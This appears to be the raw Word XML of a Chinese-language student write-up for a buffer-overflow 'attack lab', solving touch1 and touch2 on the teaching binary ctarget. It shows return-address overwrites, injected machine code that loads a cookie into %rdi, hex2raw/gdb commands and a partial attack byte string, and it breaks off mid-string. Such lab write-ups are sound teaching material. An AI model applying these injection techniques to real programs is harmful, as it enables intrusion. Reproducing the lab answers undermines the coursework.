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7D1" w14:textId="10BF0EB9" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D">
      <w:r w:rsidRPr="00E21A87">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C93FEF3" wp14:editId="6E53F278">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-169718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3594100" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="635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69D03" w14:textId="77777777" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="32C45E0E" w14:textId="3413EDF2" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="7B9C3720" w14:textId="32FBBB24" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="7E4718EF" w14:textId="08948642" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="44EF4826" w14:textId="2AAFC029" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="336B9D04" w14:textId="42737E2A" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="63BBF7AF" w14:textId="3D19DA07" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="23CE1623" w14:textId="3433FD27" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="4983A319" w14:textId="5A14DF6E" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="6DCC67A2" w14:textId="55B0A889" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="753E852E" w14:textId="7A8827C0" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="5469DC45" w14:textId="7C343614" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="7A0B967F" w14:textId="29998272" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="012E1015" w14:textId="5F2B9FBD" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="279BF2A6" w14:textId="77777777" w:rsidR="00E21A87" w:rsidRDefault="00E21A87" w:rsidP="00C2120D"/>
    <w:p w14:paraId="01775B63" w14:textId="2589D743" w:rsidR="00E21A87" w:rsidRDefault="00C2120D" w:rsidP="00C2120D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：一个容易遭受code injection攻击的可执行程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3ECA05" w14:textId="77777777" w:rsidR="00C2120D" w:rsidRDefault="00C2120D" w:rsidP="00C2120D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rtarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：一个容易遭受return-oriented programming攻击的可执行程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D8F9CA" w14:textId="77777777" w:rsidR="00C2120D" w:rsidRDefault="00C2120D" w:rsidP="00C2120D">
      <w:r>
        <w:t>cookie.txt：一个8位的十六进制码，用于验证身份的唯一标识符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF367F1" w14:textId="77777777" w:rsidR="00C2120D" w:rsidRDefault="00C2120D" w:rsidP="00C2120D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>farm.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：目标“gadget farm”的源代码，用于产生return-oriented programming攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623E29FF" w14:textId="7312EEEF" w:rsidR="00C2120D" w:rsidRDefault="00C2120D">
      <w:r>
        <w:t>hex2raw：一个生成攻击字符串的工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E5C66" w14:textId="2AAFB8B5" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="324DB51F" w14:textId="2EF0757C" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后反汇编</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2450A345" w14:textId="05DE19BF" w:rsidR="00C2120D" w:rsidRDefault="00C2120D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36D166BE" w14:textId="3FD9FC3A" w:rsidR="00C2120D" w:rsidRDefault="00C2120D">
      <w:r w:rsidRPr="00C2120D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="233EE434" wp14:editId="3FD5C02F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>377190</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13451</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3594285" cy="1403422"/>
            <wp:effectExtent l="0" t="0" r="635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95BBE" w14:textId="180380B7" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="596DB8AE" w14:textId="6152E0FF" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="438E8528" w14:textId="4D97264C" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="3AA5187D" w14:textId="6AA935F2" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="78876A24" w14:textId="7DFFD020" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="59E04EF0" w14:textId="0D413C03" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="1AA7E502" w14:textId="36092DC2" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="192D2F84" w14:textId="195C597A" w:rsidR="00C2120D" w:rsidRDefault="00C2120D" w:rsidP="00C2120D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由0x0000</w:t>
      </w:r>
      <w:r>
        <w:t>555555555</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>efa可知，缓冲区大小为0x38（</w:t>
      </w:r>
      <w:r>
        <w:t>56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCDA61" w14:textId="77777777" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="5C549E2C" w14:textId="4D392516" w:rsidR="007E6097" w:rsidRDefault="00C2120D">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ouch</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89836D" w14:textId="24EE9394" w:rsidR="00590EF8" w:rsidRDefault="00590EF8">
      <w:r w:rsidRPr="00C2120D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F2E1AC8" wp14:editId="6939164B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>15991</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1957705"/>
            <wp:effectExtent l="0" t="0" r="254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279F4" w14:textId="0107F5D3" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="26C11C64" w14:textId="0C209514" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="75930794" w14:textId="7670BF94" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="45EC6C49" w14:textId="445E84CC" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="012BE831" w14:textId="77777777" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="5A1E6CD1" w14:textId="35351FEE" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="55E178A2" w14:textId="77777777" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="65B2B397" w14:textId="10E8594F" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="15565962" w14:textId="77777777" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="293A5942" w14:textId="58DA43FE" w:rsidR="00590EF8" w:rsidRDefault="00590EF8" w:rsidP="00590EF8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>touch1函数的起始地址为0x0000555555555</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f14</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>中分配了56个字节的内存来存储输入数据。在执行ret指令后，从%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsp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顶）</w:t>
      </w:r>
      <w:r>
        <w:t>+56处获得返回地址，因此我们需要来利用缓冲区溢出覆盖掉其返回地址，就可以将返回地址修改为touch1的起始地址，即将输入的第56个字符写为touch1函数的起始地址。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（此处应</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用小</w:t>
      </w:r>
      <w:r w:rsidR="00E21A87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>法</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE80926" w14:textId="25D09B60" w:rsidR="00590EF8" w:rsidRDefault="00590EF8">
      <w:r w:rsidRPr="00590EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EE566C6" wp14:editId="5E832D15">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1672936</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>44392</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2000353" cy="135897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1A7AE" w14:textId="77777777" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="012A6A4B" w14:textId="77777777" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="274A1AF0" w14:textId="7EE49113" w:rsidR="00C2120D" w:rsidRDefault="00C2120D"/>
    <w:p w14:paraId="219E84D5" w14:textId="595AADD4" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="06CB7EAD" w14:textId="47C77276" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="497EFAE0" w14:textId="276B2D55" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="56D24A61" w14:textId="77777777" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:r>
        <w:t xml:space="preserve">cat answer1.txt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>| .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/hex2raw &gt; answer1_raw1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6D412" w14:textId="3B70E2C7" w:rsidR="00590EF8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -ex 'run -q &lt; answer1_raw1.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B8AE01" w14:textId="6BF841AA" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="2DFC06C7" w14:textId="77777777" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="6F24F838" w14:textId="389CC90D" w:rsidR="00590EF8" w:rsidRDefault="00590EF8">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ouch</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B8BD2" w14:textId="0AA83646" w:rsidR="00590EF8" w:rsidRDefault="00590EF8">
      <w:r w:rsidRPr="00590EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45DCCDDF" wp14:editId="2BBDF13E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>52243</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="397002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D43CC" w14:textId="1BDEE4F8" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="5102BB4F" w14:textId="61A178E8" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="43BA884B" w14:textId="660B7DE2" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="61E942BB" w14:textId="4CB1F4E5" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="620CE3C9" w14:textId="238B73C2" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="37E495DF" w14:textId="57564EEC" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="251E9571" w14:textId="2157E47F" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="43E5AAD0" w14:textId="7236D4AC" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="3C89C1FF" w14:textId="2DCA51C9" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="45B0602A" w14:textId="1A66046D" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="56C482EB" w14:textId="4BDF497D" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="50130B43" w14:textId="05A3F4CA" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="7DF2AEFD" w14:textId="6230164C" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="69D43B25" w14:textId="0DEDFCF8" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="7E0E799A" w14:textId="0C5BFC0A" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="3FE0BF1C" w14:textId="2C1066D8" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="0C4645DD" w14:textId="7EF2D725" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="4534988F" w14:textId="0DCD7201" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="1D9B51DA" w14:textId="6A9FE897" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="48AE9C7F" w14:textId="4EB08186" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们需要令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B6CA8">
        <w:t>getbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B6CA8">
        <w:t>返回时，执行touch2而不是返回test，并且让touch2以为其接受的输入参数是cookie，即</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>4090</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a1</w:t>
      </w:r>
      <w:r>
        <w:t>77</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6CA8">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6928B" w14:textId="3981FD45" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>touch2函数的起始地址为0x4017ec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>touch2函数的输入参数存储在寄存器%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。所以我们需要在进入touch2之前先跳转到某个地方，执行注入代码，将修改寄存器%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的值为cookie，然后再跳转。所以步骤为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0BC88" w14:textId="4312CFEB" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:r>
        <w:t>1、将</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6CA8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cookie放入寄存器%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B6CA8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6CA8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>然后将touch2函数的起始地址压入</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B6CA8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B6CA8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>，这样通过ret指令返回时就可以跳转到touch2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D85AB" w14:textId="43143087" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2、然后将利用缓冲区溢出的漏洞将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>函数返回到上述代码的起始位置，即从缓冲区的起始位置执行攻击代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896809C" w14:textId="7EE9B0E1" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的汇编代码为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AEB54D" w14:textId="71218E4B" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8">
      <w:r w:rsidRPr="005B6CA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F5CD612" wp14:editId="0A10D6FC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1323109</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>40928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2819545" cy="838243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FECEA" w14:textId="7AD07F95" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="2BBB6846" w14:textId="4F9C1A9F" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="32B633C2" w14:textId="12EC65D5" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="120B5361" w14:textId="034CA834" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="3011533D" w14:textId="77777777" w:rsidR="00BD572A" w:rsidRDefault="00BD572A" w:rsidP="00BD572A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用编译和反汇编获得注入代码的机器代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B30E5F" w14:textId="77777777" w:rsidR="00BD572A" w:rsidRDefault="00BD572A" w:rsidP="00BD572A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c attack1.s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD7582" w14:textId="273B29BB" w:rsidR="00BD572A" w:rsidRDefault="00BD572A" w:rsidP="00BD572A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d attack1.o &gt; attack1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111927E9" w14:textId="73668605" w:rsidR="005B6CA8" w:rsidRDefault="00BD572A" w:rsidP="005B6CA8">
      <w:r w:rsidRPr="00BD572A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F307151" wp14:editId="7D2C9837">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>813954</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>37465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3499030" cy="901746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C75C9" w14:textId="1E2F5EF6" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="1A5ACD06" w14:textId="287827DD" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="249E041B" w14:textId="5D1049D6" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="54ED8243" w14:textId="77777777" w:rsidR="005B6CA8" w:rsidRDefault="005B6CA8" w:rsidP="005B6CA8"/>
    <w:p w14:paraId="780FAEF8" w14:textId="4D86F989" w:rsidR="00BD572A" w:rsidRDefault="00BD572A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入字符串为 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">48 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c7</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 77 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 90 40 48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4</w:t>
      </w:r>
      <w:r>
        <w:t>4 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> 55 55 55 55 00 00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 56 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c3（剩下的5</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
